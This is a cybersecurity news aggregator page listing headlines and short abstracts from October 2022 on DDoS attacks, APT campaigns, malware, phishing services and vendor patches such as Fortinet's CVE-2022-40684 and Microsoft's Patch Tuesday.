Web infrastructure and security company Cloudflare disclosed this week that it halted a 2.5 Tbps distributed denial-of-service (DDoS) attack launched by a Mirai botnet. Characterizing it as a "multi-vector attack consisting of UDP and TCP floods," researcher Omer Yoachimik said the DDoS attack targeted the Minecraft server Wynncraft in Q3 2022. "The entire 2.5 Tbps attack lasted about 2 minutes, and the peak of the 26 million rps attack [was] only 15 seconds," Yoachimik noted . "This is the largest attack we've ever seen from the bitrate perspective." Cloudflare also pointed to a surge in multi-terabit DDoS attacks as well as longer-lasting volumetric attacks during the time period, not to mention an uptick in attacks targeting Taiwan and Japan. The disclosure comes almost 10 months after Microsoft said it thwarted a record-breaking 3.47 Tbps DDoS attack in November 2021 directed against an unnamed Azure customer in Asia. Other DDoS attacksThe Hacker News
October 14, 2022 – Government
Cobalt Strike Infections Haunt Healthcare - Warns HHS Full Text
Abstract
Tens of thousands of organizations each year are now affected by a hack involving Cobalt Strike, warned HHS. Apart from using Cobalt Strike, threat actors are using PowerShell, Mimikatz, Sysinternals, Brute Ratel, and Anydesk against healthcare facilities. State-sponsored threat actors, mostly the ... Read MoreCyware Alerts - Hacker News
October 14, 2022 – Malware
PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks Full Text
Abstract
A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. "FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said . "Additionally, a user can SSH into the system which exposes a locked down CLI interface." The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access "to do just about anything" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic. That said,The Hacker News
October 13, 2022 – Attack
Fast Company says Executive Board member info was not stolen in attack Full Text
Abstract
American business magazine Fast Company reached out to its Executive Board members this week to let them know their personal information was not stolen in a September 27 cyberattack that forced it to shut down its website.BleepingComputer
October 13, 2022 – General
Clarifying Responsible Cyber Power: Developing Views in the U.K. Regarding Non-intervention and Peacetime Cyber Operations Full Text
Abstract
A response to a previous Lawfare article on the U.K.’s cyber strategy, emphasizing the need to develop a nuanced, incremental development of that strategy over timeLawfare
October 13, 2022 – APT
China-linked Budworm APT returns to target a US entity Full Text
Abstract
The Budworm espionage group resurfaced targeting a U.S.-based organization for the first time, Symantec Threat Hunter team reported. The Budworm cyber espionage group (aka APT27, Bronze Union, Emissary Panda, Lucky Mouse, TG-3390, and Red Phoenix)...Security Affairs
October 13, 2022 – Malware
Exploit available for critical Fortinet auth bypass bug, patch now Full Text
Abstract
Proof-of-concept exploit code is now available for a critical authentication bypass vulnerability affecting Fortinet's FortiOS, FortiProxy, and FortiSwitchManager appliances.BleepingComputer
October 13, 2022 – Denial Of Service
Cloudflare blocked a 2.5 Tbps DDoS attack aimed at the Minecraft server Full Text
Abstract
Cloudflare mitigated a record distributed denial-of-service (DDoS) attack against Wynncraft, one of the largest Minecraft servers. Cloudflare announced it has mitigated a record distributed denial-of-service (DDoS) attack against Wynncraft, one of the largest...Security Affairs
October 13, 2022 – Denial Of Service
Russian DDoS attack project pays contributors for more firepower Full Text
Abstract
A pro-Russian group created a crowdsourced project called 'DDOSIA' that pays volunteers launching distributed denial-of-service (DDOS) attacks against western entities.BleepingComputer
October 13, 2022 – Criminals
Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves Full Text
Abstract
Last week, Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing.Wired
October 13, 2022 – Malware
New Chinese Malware Attack Framework Targets Windows, macOS, and Linux Systems Full Text
Abstract
A previously undocumented command-and-control (C2) framework dubbed Alchimist is likely being used in the wild to target Windows, macOS, and Linux systems. "Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy payload to the remote machines, capture screenshots, perform remote shellcode execution, and run arbitrary commands," Cisco Talos said in a report shared with The Hacker News. Written in GoLang, Alchimist is complemented by a beacon implant called Insekt, which comes with remote access features that can be instrumented by the C2 server. The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka , which has been touted as the "Chinese sibling of Sliver and Cobalt Strike." Even more interestingly, both Manjusaka and Alchimist pack in similar functionalities, despThe Hacker News
October 13, 2022 – Malware
The discovery of Alchimist C2 tool, revealed a new attack framework to target Windows, macOS, and Linux systems Full Text
Abstract
Experts discovered a new attack framework, including a C2 tool dubbed Alchimist, used in attacks against Windows, macOS, and Linux systems. Researchers from Cisco Talos discovered a new, previously undocumented attack framework that included a C2 dubbed...Security Affairs
October 13, 2022 – Ransomware
Magniber ransomware now infects Windows users via JavaScript files Full Text
Abstract
A recent malicious campaign delivering Magniber ransomware has been targeting Windows home users with fake security updates.BleepingComputer
October 13, 2022 – Outage
Australia’s Medibank reports cyber incident, shares on trading halt Full Text
Abstract
The company said it took "immediate steps to contain the incident, and engaged specialized cybersecurity firms", adding that there was no evidence that any sensitive data, including customer data, had been accessed at this stage.Reuters
October 13, 2022 – Vulnerabilities
New Timing Attack Against NPM Registry API Could Expose Private Packages Full Text
Abstract
A novel timing attack discovered against the npm's registry API can be exploited to potentially disclose private packages used by organizations, putting developers at risk of supply chain threats. "By creating a list of possible package names, threat actors can detect organizations' scoped private packages and then masquerade public packages, tricking employees and users into downloading them," Aqua Security researcher Yakir Kadkoda said . The Scoped Confusion attack banks on analyzing the time it takes for the npm API (registry.npmjs[.]org) to return an HTTP 404 error message when querying for a private package, and measuring it against the response time for a non-existing module. "It takes on average less time to get a reply for a private package that does not exist compared to a private package that does," Kadkoda explained. The idea, ultimately, is to identify packages internally used by companies, which could then be used by threat actors toThe Hacker News
October 13, 2022 – APT
POLONIUM APT targets Israel with a new custom backdoor dubbed PapaCreep Full Text
Abstract
An APT group tracked as Polonium employed custom backdoors in attacks aimed at Israelian entities since at least September 2021. POLONIUM APT focused only on Israeli targets, it launched attacks against more than a dozen organizations in various industries,...Security Affairs
October 13, 2022 – Education
What the Uber Hack can teach us about navigating IT Security Full Text
Abstract
The recent Uber cyberattack shows us the myriad tactics employed by threat actors to breach corporate networks. Learn more about these tactics used and how to navigate IT Security.BleepingComputer
October 13, 2022 – Hacker
Budworm Espionage Group Returns to Targeting U.S. Organizations Full Text
Abstract
Budworm’s main payload continues to be the HyperBro malware family, which is often loaded using a technique known as DLL side-loading. This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found.Symantec
October 13, 2022 – General
Does the OWASP Top 10 Still Matter? Full Text
Abstract
What is the OWASP Top 10, and – just as important – what is it not? In this review, we look at how you can make this critical risk report work for you and your organisation. What is OWASP? OWASP is the Open Web Application Security Project, an international non-profit organization dedicated to improving web application security. It operates on the core principle that all of its materials are freely available and easily accessible online, so that anyone anywhere can improve their own web app security. It offers a number of tools, videos, and forums to help you do this – but their best-known project is the OWASP Top 10. The top 10 risks The OWASP Top 10 outlines the most critical risks to web application security. Put together by a team of security experts from all over the world, the list is designed to raise awareness of the current security landscape and offer developers and security professionals invaluable insights into the latest and most widespread security risks. It alThe Hacker News
October 13, 2022 – Malware
YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan Full Text
Abstract
Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named 'YoWhatsApp' that steals access keys...Security Affairs
October 13, 2022 – Denial Of Service
Cloudflare mitigated record DDoS attack against Minecraft server Full Text
Abstract
Wynncraft, one of the largest Minecraft servers, was recently hit by a 2.5 Tbps distributed denial-of-service (DDoS) attack.BleepingComputer
October 13, 2022 – Hacker
New Alchimist Attack Framework Written in Chinese for Mac, Linux, and Windows Full Text
Abstract
Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities.Cisco Talos
October 13, 2022 – Hacker
Budworm Hackers Resurface with New Espionage Attacks Aimed at U.S. Organization Full Text
Abstract
An advanced persistent threat (APT) actor known as Budworm targeted a U.S.-based entity for the first time in more than six years, according to latest research. The attack was aimed at an unnamed U.S. state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. Other "strategically significant" intrusions mounted over the past six months were directed against a government of a Middle Eastern country, a multinational electronics manufacturer, and a hospital in South East Asia. Budworm , also called APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that's believed to operate on behalf of China through attacks that leverage a mix of custom and openly available tools to exfiltrate information of interest. "Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments it operates in," Secureworks notes in a profile ofThe Hacker News
October 13, 2022 – General
New Alchimist attack framework targets Windows, macOS, Linux Full Text
Abstract
Cybersecurity researchers have discovered a new attack and C2 framework called 'Alchimist,' which appears to be actively used in attacks targeting Windows, Linux, and macOS systems.BleepingComputer
October 13, 2022 – APT
New Chinese APT Targets IT Service Providers and Telcos with Signed Malware Full Text
Abstract
As the toolset itself appears to be shared among several actors, it is unclear whether this is a new iteration of operation “Shadow Force” or simply a different actor utilizing similar TTPs.Sentinel One
October 13, 2022 – Malware
Modified WhatsApp App Caught Infecting Android Devices with Malware Full Text
Abstract
An unofficial version of the popular WhatsApp messaging app called YoWhatsApp has been observed deploying an Android trojan known as Triada. The goal of the malware is to steal the keys that "allow the use of a WhatsApp account without the app ," Kaspersky said in a new report. "If the keys are stolen, a user of a malicious WhatsApp mod can lose control over their account." YoWhatsApp offers the ability for users to lock chats, send messages to unsaved numbers, and customize the app with a variety of theming options. It's also said to share overlaps with other modded WhatsApp clients such as FMWhatsApp and HeyMods. The Russian cybersecurity company said it found the malicious functionality in YoWhatsApp version 2.22.11.75. Typically spread through fraudulent ads on Snaptube and Vidmate, the app, upon installation, requests the victims to grant it permissions to access SMS messages, enabling the malware to enroll them to paid subscriptions without theirThe Hacker News
October 13, 2022 – Attack
Mango Markets Loses Over $100 Million in Flash Loan Attack Full Text
Abstract
Mango Markets took to Twitter Tuesday evening to tell users that it was investigating an incident “where a hacker was able to drain funds from Mango via… price manipulation.”The Record
October 12, 2022 – Solution
Microsoft adds new RSS feed for security update notifications Full Text
Abstract
Microsoft has now made it possible to receive notifications about new security updates through a new RSS feed for the Security Update Guide.BleepingComputer
October 12, 2022 – Phishing
Phishing Campaigns Made Easy, Courtesy Caffeine Full Text
Abstract
A new phishing-as-a-service, dubbed Caffeine, was found offering an open registration and customer service support for newbies to help the launch their own campaign. It's a bit pricy but what makes Caffeine subscription 3–5 times costlier than its contemporaries is that it offers anti-detectio ... Read MoreCyware Alerts - Hacker News
October 12, 2022 – Phishing
Hackers Using Vishing to Trick Victims into Installing Android Banking Malware Full Text
Abstract
Malicious actors are resorting to voice phishing (vishing) tactics to dupe victims into installing Android malware on their devices, new research from ThreatFabric reveals. The Dutch mobile security company said it identified a network of phishing websites targeting Italian online-banking users that are designed to get hold of their contact details. Telephone-oriented attack delivery (TOAD), as the social engineering technique is called, involves calling the victims using previously collected information from fraudulent websites. The caller, who purports to be a support agent for the bank, instructs the individual, on the other hand, to install a security app and grant it extensive permissions, when, in reality, it's malicious software intended to gain remote access or conduct financial fraud. In this case, it leads to the deployment of an Android malware dubbed Copybara , a mobile trojan first detected in November 2021 and is primarily used to perform on-device fraud via oThe Hacker News
October 12, 2022 – Vulnerabilities
Aruba fixes critical vulnerabilities in EdgeConnect Enterprise Orchestrator Full Text
Abstract
Aruba addressed multiple critical severity vulnerabilities in the EdgeConnect Enterprise Orchestrator. Aruba addressed multiple critical severity vulnerabilities in the EdgeConnect Enterprise Orchestrator that can be exploited by remote attackers...Security Affairs
October 12, 2022 – Malware
Unofficial WhatsApp Android app caught stealing users’ accounts Full Text
Abstract
A new version of an unofficial WhatsApp Android application named 'YoWhatsApp' has been found stealing access keys for users' accounts.BleepingComputer
October 12, 2022 – Botnet
PseudoManuscrypt Botnet Evolves to Infect More Systems Full Text
Abstract
The relatively new PseudoManuscrypt botnet made some changes to its C2 infrastructure that enabled the threat actors infect nearly 500,000 systems across 40 countries in the past eight months. Previously, Kaspersky had reported a similar technique being used by different malware families such as So ... Read MoreCyware Alerts - Hacker News
October 12, 2022 – Solution
Scribe Platform: End-to-end Software Supply Chain Security Full Text
Abstract
As software supply chain security becomes more and more crucial, security, DevSecOps, and DevOps teams are more challenged than ever to build transparent trust in the software they deliver or use. In fact, in Gartner recently published their 2022 cybersecurity predictions - not only do they anticipate the continued expansion of attack surfaces in the near future, they also list digital supply chain as a major rising attack surface and one of the top trends to follow in 2022. After all, any software is only as secure as the weakest link in its supply chain. One bad component, any malicious access to your development environment—or any vulnerability in your software's delivery life cycle—and you risk your code's integrity, your customers, and your reputation. Scribe Security recently launched a new platform that claims to address these urgent needs by enabling its users to build trust in their software across teams and organizations. According to Scribe Security, SBOM is a bThe Hacker News
October 12, 2022 – Vulnerabilities
Microsoft Patch Tuesday for October 2022 doesn’t fix Exchange Server flaws Full Text
Abstract
Microsoft Patch Tuesday security updates for October 2022 addressed a total of 85 security vulnerabilities, including an actively exploited zero-day. Microsoft Patch Tuesday security updates for October 2022 addressed 85 new vulnerabilities in multiple...Security Affairs
October 12, 2022 – Solution
Microsoft Defender adds command and control traffic detection Full Text
Abstract
Microsoft has added command-and-control (C2) traffic detection capabilities to its Microsoft Defender for Endpoint (MDE) enterprise endpoint security platform.BleepingComputer
October 12, 2022 – Denial Of Service
What Shaped the DDoS Landscape so Far this Year? Full Text
Abstract
Today, we take a look at the new DDoS trends formed this year as the geopolitical situation in Eastern Europe continue to shape the nature and intensity of DDoS attacks. The first half of the year has witnessed multiple attacks on financial and government institutions. Last month, the LockBit ranso ... Read MoreCyware Alerts - Hacker News
October 12, 2022 – Solution
Google Rolling Out Passkey Passwordless Login Support to Android and Chrome Full Text
Abstract
Google on Wednesday officially rolled out support for passkeys, the next-generation authentication standard, to both Android and Chrome. "Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant said . "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks." The feature was first announced in May 2022 as part of a broader push to support a common passwordless sign-in standard. Passkeys, established by the FIDO Alliance and also backed by Apple and Microsoft , aim to replace standard passwords with unique digital keys that are stored locally on the device. To that end, creating a passkey requires confirmation from the end-user about the account that will be used to log in to the online service, followed by using their biometric information or the device passcode . Signing in to a website on a mobile device is also a simple two-step process that eThe Hacker News
October 12, 2022 – Vulnerabilities
VMware has yet to fix CVE-2021-22048 flaw in vCenter Server disclosed one year ago Full Text
Abstract
VMware has yet to address the CVE-2021-22048 privilege escalation vulnerability in vCenter Server disclosed in November 2021. VMware warns customers that it has yet to address a high-severity privilege escalation vulnerability, tracked as CVE-2021-22048,...Security Affairs
October 12, 2022 – Vulnerabilities
Aruba fixes critical RCE and auth bypass flaws in EdgeConnect Full Text
Abstract
Aruba has released security updates for the EdgeConnect Enterprise Orchestrator, addressing multiple critical severity vulnerabilities that enable remote attackers to compromise the host.BleepingComputer
October 12, 2022 – Business
Vista Equity Partners acquires KnowBe4 for $4.6 billion in cash Full Text
Abstract
KnowBe4 has entered into a definitive agreement to be acquired by Vista Equity Partners in an all-cash transaction valued at approximately $4.6 billion on an equity value basis.Help Net Security
October 12, 2022 – Breach
64,000 Additional Patients Impacted by Omnicell Data Breach - What is Your Data Breach Action Plan? Full Text
Abstract
In April 2022, Omnicell reported a data breach affecting nearly 62,000 patients. The company has revealed that the incident has impacted an additional 64,000 individuals. This brings the total number of patients affected to over 126,000. Will you be the next victim like Omnicell? If you are overlooking the importance of data protection, attackers can get you in no time. Explore the impact of the data breach on the healthcare sector and what preventive measures can be taken against such attacks. Omnicell Announced Data Breach Founded in 1992, Omnicell is a leading provider of medication management solutions for hospitals, long-term care facilities, and retail pharmacies. On May 4, 2022, Omnicell's IT systems and third-party cloud services were affected by ransomware attacks which may lead to data security concerns for employees and patients. While it is still early in the investigation, this appears to be a severe breach with potentially significant consequences for theThe Hacker News
October 12, 2022 – Ransomware
LockBit affiliates compromise Microsoft Exchange servers to deploy ransomware Full Text
Abstract
Lockbit ransomware affiliates are compromising Microsoft Exchange servers to deploy their ransomware, experts warn. South-Korean cybersecurity firm AhnLab reported that Lockbit ransomware affiliates are distributing their malware via compromised Microsoft...Security Affairs
October 12, 2022 – General
New npm timing attack could lead to supply chain attacks Full Text
Abstract
Security researchers have discovered an npm timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead.BleepingComputer
October 12, 2022 – Business
Cyber training platform pulls in another $66M after post-pandemic remote working increases cyber threats Full Text
Abstract
Ten Eleven Ventures led the latest round, while existing investors Goldman Sachs Asset Management, Summit Partners, Insight Partners, Menlo Ventures, and Citi Ventures all participated in the round.Tech Crunch
October 12, 2022 – Vulnerabilities
Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys Full Text
Abstract
A vulnerability in Siemens Simatic programmable logic controller (PLC) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal , while bypassing all four of its access level protections ," industrial cybersecurity company Claroty said in a new report. "A malicious actor could use this secret information to compromise the entire SIMATIC S7-1200/1500 product line in an irreparable way." The critical vulnerability, assigned the identifier CVE-2022-38465 , is rated 9.3 on the CVSS scoring scale and has been addressed by Siemens as part of security updates issued on October 11, 2022. The list of impacted products and versions is below - SIMATIC Drive Controller family (all versions before 2.9.2) SIMATIC ET 200SP Open Controller CPU 1515SP PC2, including SIPLUS variants (allThe Hacker News
October 12, 2022 – Solution
Google simplifies sign-ins with Chrome, Android passkey support Full Text
Abstract
Google announced today that it's introducing passkey support to both its Google Chrome web browser and the Android operating system to simplify sign-ins across apps, websites, and devices.BleepingComputer
October 12, 2022 – Vulnerabilities
Chrome 106 Update Patches Several High-Severity Vulnerabilities Full Text
Abstract
Based on the bug bounty amounts that Google has paid out, the most severe of the newly addressed flaws is CVE-2022-3445, a use-after-free vulnerability in Skia, the open-source 2D graphics library that serves as Chrome’s graphics engine.Security Week
October 12, 2022 – Vulnerabilities
Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs Full Text
Abstract
Microsoft's Patch Tuesday update for the month of October has addressed a total of 85 security vulnerabilities , including fixes for an actively exploited zero-day flaw in the wild. Of the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the actively exploited ProxyNotShell flaws in Exchange Server . The patches come alongside updates to resolve 12 other flaws in the Chromium-based Edge browser that have been released since the beginning of the month. Topping the list of this month's patches is CVE-2022-41033 (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the issue. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," the company said in an advisory, cautioning that the shortcoming is being actively weaponized inThe Hacker News
October 12, 2022 – Phishing
Google Forms abused in new COVID-19 phishing wave in the U.S. Full Text
Abstract
COVID-19-themed phishing messages are once again spiking in the U.S. following a prolonged summer hiatus that appears to be over.BleepingComputer
October 12, 2022 – General
Election workers in battleground states faced onslaught of malicious emails, researchers say Full Text
Abstract
County election workers in Arizona and Pennsylvania were inundated with a “surge” in malicious emails ahead of those states’ August primaries, researchers said Wednesday, highlighting the ongoing threat facing election officials before midterms.CyberScoop
October 12, 2022 – Criminals
Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Full Text
Abstract
Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative newcomer to the commercial C&C Framework space, where it competes with more established players such as Cobalt Strike.Trend Micro
October 11, 2022 – Solution
All Windows versions can now block admin brute-force attacks Full Text
Abstract
Microsoft announced today that IT admins can now configure any Windows system still receiving security updates to automatically block brute force attacks targeting local administrator accounts via a group policy.BleepingComputer
October 11, 2022 – Government
Feds Warn Healthcare Over Cobalt Strike Infections Full Text
Abstract
Cobalt Strike, whose legitimate user base consists of white hat hackers, is being abused "with increasing frequency" against many industries, including the healthcare and public health sector, by ransomware gangs and various APT groups, HC3 writes.Bank Info Security
October 11, 2022 – Phishing
BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics Full Text
Abstract
The operators behind the BazaCall call back phishing method have continued to evolve with updated social engineering tactics to deploy malware on targeted networks. The scheme eventually acts as an entry point to conduct financial fraud or the delivery of next-stage payloads such as ransomware, cybersecurity company Trellix said in a report published last week. Primary targets of the latest attack waves include the U.S., Canada, China, India, Japan, Taiwan, the Philippines, and the U.K. BazaCall , also called BazarCall, first gained popularity in 2020 for its novel approach of distributing the BazarBackdoor (aka BazarLoader) malware by manipulating potential victims into calling a phone number specified in decoy email messages. These email baits aim to create a false sense of urgency, informing the recipients about renewal of a trial subscription for, say, an antivirus service. The messages also urge them to contact their support desk to cancel the plan, or risk getting automatThe Hacker News
October 11, 2022 – Phishing
Caffeine, a new Phishing-as-a-Service toolkit available in the underground Full Text
Abstract
Researchers warn of a new phishing-as-a-service (PhaaS) toolkit, called Caffeine, which is being used by cybercriminals. In March 2022, Mandiant researchers discovered threat actors using a shared Phishing-as-a-Service (PhaaS) platform called Caffeine....Security Affairs
October 11, 2022 – Vulnerabilities
Android leaks some traffic even when ‘Always-on VPN’ is enabled Full Text
Abstract
Mullvad VPN has discovered that Android leaks traffic every time the device connects to a WiFi network, even if the "Block connections without VPN," or "Always-on VPN," features is enabled.BleepingComputer
October 11, 2022 – Vulnerabilities
Hidden DNS resolver insecurity creates widespread website hijack risk Full Text
Abstract
Closed DNS resolvers are used by numerous hosting providers and other internet service providers (ISPs) to provision services to their clients. As the name suggests, closed DNS resolvers reside on closed networks or intranets.The Daily Swig
October 11, 2022 – Vulnerabilities
Researchers Detail Critical RCE Flaw Reported in Popular vm2 JavaScript Sandbox Full Text
Abstract
A now-patched security flaw in the vm2 JavaScript sandbox module could be abused by a remote adversary to break out of security barriers and perform arbitrary operations on the underlying machine. "A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox," GitHub said in an advisory published on September 28, 2022. The issue, tracked as CVE-2022-36067 and codenamed Sandbreak, carries a maximum severity rating of 10 on the CVSS vulnerability scoring system. It has been addressed in version 3.9.11 released on August 28, 2022. vm2 is a popular Node library that's used to run untrusted code with allowlisted built-in modules. It's also one of the most widely downloaded software, accounting for nearly 3.5 million downloads per week. The shortcoming is rooted in the error mechanism in Node.js to escape the sandbox, according to application security firm Oxeye, which discovered the flaw . This meanThe Hacker News
October 11, 2022 – Hacker
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
Threat actors behind the Emotet bot are continually improving their tactics, techniques, and procedures to avoid detection. VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting...Security Affairs
October 11, 2022 – Vulnerabilities
VMware vCenter Server bug disclosed last year still not patched Full Text
Abstract
VMware informed customers today that vCenter Server 8.0 (the latest version) is still waiting for a patch to address a high-severity privilege escalation vulnerability disclosed in November 2021.BleepingComputer
October 11, 2022 – Deepfake
DeepFakes are the Cybercriminal Economy’s Latest Business Line Full Text
Abstract
Introduced by Canadian researchers to the public in 2014, Generative Adversarial Networks (GANs), typically imitate people’s faces, speech, and unique facial gestures, they have become known to online communities as DeepFakes.Security Affairs
October 11, 2022 – General
The Latest Funding News and What it Means for Cyber Security in 2023 Full Text
Abstract
The White House has recently announced a $1 billion cyber security grant program that is designed to help state and local governments improve their cyber defenses, especially about protecting critical infrastructure. The recent executive order stems from the $1.2 trillion infrastructure bill that was signed almost a year ago. That bill allocated $1 billion for protecting critical infrastructure against cyber-attack in the wake of a series of high-profile ransomware attacks such as the one that brought down the Colonial Pipeline. Those government agencies who wish to take advantage of these funding opportunities must submit a grant proposal by mid-November. Proposals are only being accepted for the sixty days following the program's announcement. Grant recipients can use the funding to invest in new cybersecurity initiatives or to make improvements to existing defenses. Awardees are guaranteed to receive a minimum of $2 million. However, the program's requirements stipulThe Hacker News
October 11, 2022 – Criminals
DeepFakes Are The Cybercriminal Economy’s Latest Business Line Full Text
Abstract
California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams,...Security Affairs
October 11, 2022 – Vulnerabilities
Microsoft October 2022 Patch Tuesday fixes zero-day used in attacks, 84 flaws Full Text
Abstract
Today is Microsoft's October 2022 Patch Tuesday, and with it comes fixes for an actively exploited Windows vulnerability and a total of 84 flaws.BleepingComputer
October 11, 2022 – Malware
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting their tactics, techniques, and procedures to avoid detection.Security Affairs
October 11, 2022 – Phishing
Researchers Warn of New Phishing-as-a-Service Being Used by Cyber Criminals Full Text
Abstract
Cyber criminals are using a previously undocumented phishing-as-a-service (PhaaS) toolkit called Caffeine to effectively scale up their attacks and distribute nefarious payloads. "This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing campaigns," Mandiant said in a new report. Some of the core features offered by the platform comprise the ability to craft customized phishing kits, manage redirect pages, dynamically generate URLs that host the payloads, and track the success of the campaigns. The development comes a little over a month after Resecurity took the wraps off another PhaaS service dubbed EvilProxy that's offered for sale on dark web criminal forums. But unlike EvilProxy, whose operators are known to vet prospective customers before activating the subscriptions, Caffeine is notable for running an oThe Hacker News
October 11, 2022 – Breach
Toyota discloses accidental leak of some customers’ personal information Full Text
Abstract
Toyota Motor Corporation discloses data leak, customers' personal information may have been exposed after an access key was exposed on GitHub. Toyota Motor Corporation warns customers that their personal information may have been accidentally exposed...Security Affairs
October 11, 2022 – Ransomware
Microsoft Exchange servers hacked to deploy LockBit ransomware Full Text
Abstract
Microsoft is investigating reports of a new zero-day bug abused to hack Exchange servers which were later used to launch Lockbit ransomware attacks.BleepingComputer
October 11, 2022 – Hacker
POLONIUM Threat Group Targets Israeli Organizations with ‘Creepy’ Malware Full Text
Abstract
ESET researchers revealed their findings about POLONIUM, an advanced persistent threat (APT) group about which little information is publicly available and its initial compromise vector is unknown.ESET Security
October 11, 2022 – Vulnerabilities
Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug Full Text
Abstract
Fortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild. Tracked as CVE-2022-40684 (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative interface via specially crafted HTTP(S) requests. "Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user='Local_Process_Access,'" the company noted in an advisory. The list of impacted devices is below - FortiOS version 7.2.0 through 7.2.1 FortiOS version 7.0.0 through 7.0.6 FortiProxy version 7.2.0 FortiProxy version 7.0.0 through 7.0.6 FortiSwitchManager version 7.2.0, and FortiSwitchManager version 7.0.0 Updates havThe Hacker News
October 11, 2022 – Vulnerabilities
Critical VM2 flaw lets attackers run code outside the sandbox Full Text
Abstract
Researchers are warning of a critical remote code execution flaw in 'vm2', a JavaScript sandbox library downloaded over 16 million times per month via the NPM package repository.BleepingComputer
October 11, 2022 – Phishing
Caffeine Phishing-as-a-Service Platform Offers Open Registration and Customer Service Support for Attackers Full Text
Abstract
This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing campaigns.Mandiant
October 11, 2022 – Malware
Hacking group POLONIUM uses ‘Creepy’ malware against Israel Full Text
Abstract
Security researchers reveal previously unknown malware used by the cyber espionage hacking group 'POLONIUM,' threat actors who appear to target Israeli organizations exclusively.BleepingComputer
October 11, 2022 – Government
UK Spy Chief to Warn of ‘Huge’ China Tech Threat Full Text
Abstract
Britain's GCHQ spy agency chief will warn Western countries Tuesday of the "huge threat" from China seeking to exploit its tech dominance to control its own citizens and gain influence abroad.Security Week
October 11, 2022 – Vulnerabilities
New ‘Thermal Attack’ can Read User Passwords From the Heat Signatures Left While Typing Full Text
Abstract
Computer security researchers say they've developed an AI-driven system that can guess computer and smartphone passwords in seconds by examining the heat signatures that fingertips leave on keyboards and screens when entering data.ZDNet
October 11, 2022 – Business
Endor Labs Joins Race to Secure Software Supply Chain Full Text
Abstract
Endor Labs announced the closing of a $25 million seed round to build a dependency lifecycle management platform. Investors betting on Endor Labs include Lightspeed Venture Partners and Dell Technologies Capital.Security Week
October 10, 2022 – Phishing
Caffeine service lets anyone launch Microsoft 365 phishing attacks Full Text
Abstract
A phishing-as-a-service (PhaaS) platform named 'Caffeine' makes it easy for threat actors to launch attacks, featuring an open registration process allowing anyone to jump in and start their own phishing campaigns.BleepingComputer
October 10, 2022 – General
Internet traffic route protection is broken, study claims Full Text
Abstract
An internet security mechanism named Resource Public Key Infrastructure (RPKI), intended to safeguard the routing of data traffic, is broken, according to security experts from Germany's ATHENE, the National Research Center for Applied Cybersecurity.The Register
October 10, 2022 – Malware
Researchers Detail Malicious Tools Used by Cyberespionage Group Earth Aughisky Full Text
Abstract
